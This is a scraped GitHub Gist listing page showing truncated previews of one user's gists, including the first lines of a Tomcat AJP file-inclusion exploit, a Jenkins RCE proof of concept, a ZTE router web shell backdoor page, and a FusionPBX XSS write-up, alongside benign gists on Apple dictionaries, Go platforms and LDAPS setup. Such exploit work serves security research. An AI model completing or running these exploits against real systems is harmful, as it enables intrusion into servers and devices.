xax007

@xax007
xax007 / tomcat-ajp-lfi.py
Created Feb 23, 2020
Apache Tomcat AJP local file include and code execution exploit
View tomcat-ajp-lfi.py
#!/usr/bin/env python
#Tomcat-Ajp lfi
import struct
# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
    if s is None:
        return struct.pack(">h", -1)
    l = len(s)
@xax007
xax007 / FusionPBX-XSS.md
Last active Nov 29, 2019
FusionPBX-XSS
View FusionPBX-XSS.md
@xax007
xax007 / FusionPBX-XSS.md
Last active Nov 20, 2019
FusionPBX XSS
View FusionPBX-XSS.md

XSS 1

Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

...
    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
    }
...
@xax007
xax007 / Suricata_Rules_Descriptionaa
Created Jun 3, 2019
Suricata_Rules_Descriptionaa
View Suricata_Rules_Descriptionaa
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer No TLS after STARTTLS
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
@xax007
xax007 / 0dedict.py
Created May 5, 2019 — forked from josephg/0dedict.py
Apple dictionaries
View 0dedict.py
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python 0dedict.py
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mojave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/Body.data'
f = open(filename, 'rb')
View newol.dat
@xax007
xax007 / go-os-arch.md
Created Apr 11, 2019 — forked from asukakenji/go-os-arch.md
Go (Golang) GOOS and GOARCH
View go-os-arch.md

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by Go out of the box, i.e. without the help of a C compiler, etc.)

  • android
  • darwin
@xax007
xax007 / README.md
Created Mar 16, 2019 — forked from Tom4t0/README.md
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.
View README.md

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default, Microsoft Active Directory servers offer LDAP over unencrypted connections (boo!).

The steps below create a new self-signed certificate appropriate for use with an AD server, thus enabling LDAPS. Of course, the "self-signed" portion of this guide can be swapped out for a real vendor-purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

View CVE-2019-1003000-Jenkins-RCE-POC.py
import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
@xax007
xax007 / web_shell_cmd.gch
Created Nov 30, 2018
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
View web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F460 Webshell
</title>